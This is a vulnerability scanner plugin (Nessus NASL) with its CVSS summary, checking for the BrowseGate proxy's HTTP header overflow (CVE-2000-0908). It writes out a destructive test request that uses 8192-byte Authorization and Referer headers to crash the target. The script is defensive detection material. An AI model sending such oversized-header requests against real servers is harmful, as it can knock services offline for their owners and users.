CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
EPSS
Percentile
92.7%
It is possible to kill the remote server by sending it an invalid request with too long HTTP headers (Authorization and Referer).
BrowseGate proxy is known to be vulnerable to this flaw.
An attacker could exploit this vulnerability to cause the web server to crash continually or to execute arbitrary code on the system.
#
# (C) Tenable Network Security, Inc.
#
# This is an old bug. I don't know if we need _two_ overflows to
# crash BrowseGate or if this crashes any other web server
#
# Script audit and contributions from Carmichael Security
# Erik Anderson <[email protected]> (nb: this domain no longer exists)
# Added BugtraqID and CVE
include("compat.inc");
if (description)
{
script_id(11130);
script_version("1.29");
script_set_attribute(attribute:"plugin_modification_date", value:"2020/08/05");
script_cve_id("CVE-2000-0908");
script_bugtraq_id(1702);
script_name(english:"BrowseGate HTTP MIME Headers Remote Overflow");
script_summary(english:"Too long HTTP headers kill BrowseGate");
script_set_attribute(attribute:"synopsis", value:"It may be possible to execute arbitrary code on the remote web server.");
script_set_attribute(attribute:"description", value:
"It is possible to kill the remote server by sending it an invalid
request with too long HTTP headers (Authorization and Referer).
BrowseGate proxy is known to be vulnerable to this flaw.
An attacker could exploit this vulnerability to cause the web server
to crash continually or to execute arbitrary code on the system.");
script_set_attribute(attribute:"solution", value:"Upgrade your software or protect it with a filtering reverse proxy");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2000-0908");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2000/09/18");
script_set_attribute(attribute:"plugin_publication_date", value:"2002/09/21");
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_DESTRUCTIVE_ATTACK);
script_copyright(english:"This script is Copyright (C) 2002-2020 Tenable Network Security, Inc.");
script_family(english:"Web Servers");
script_dependencies("http_version.nasl", "smtp_settings.nasl");
script_require_keys("Settings/ParanoidReport");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
if (report_paranoia < 2) audit(AUDIT_PARANOID);
port = get_http_port(default:80);
if (http_is_dead(port: port)) exit(1, "The web server on port "+port+" is dead already.");
domain = get_kb_item('Settings/third_party_domain');
if (!domain) domain = 'example.com';
http_send_recv3(port: port, item: "/", method: 'GET',
add_headers:
make_array( "Authorization", "Basic"+crap(8192),
"Referer", "http://www." + domain + "/" + crap(8192) ) );
# "From: [email protected]\r\n",
# "If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT\r\n",
# "UserAgent: Nessus 1.2.6\r\n\r\n
if (http_is_dead(port: port, retry: 3)) { security_hole(port); }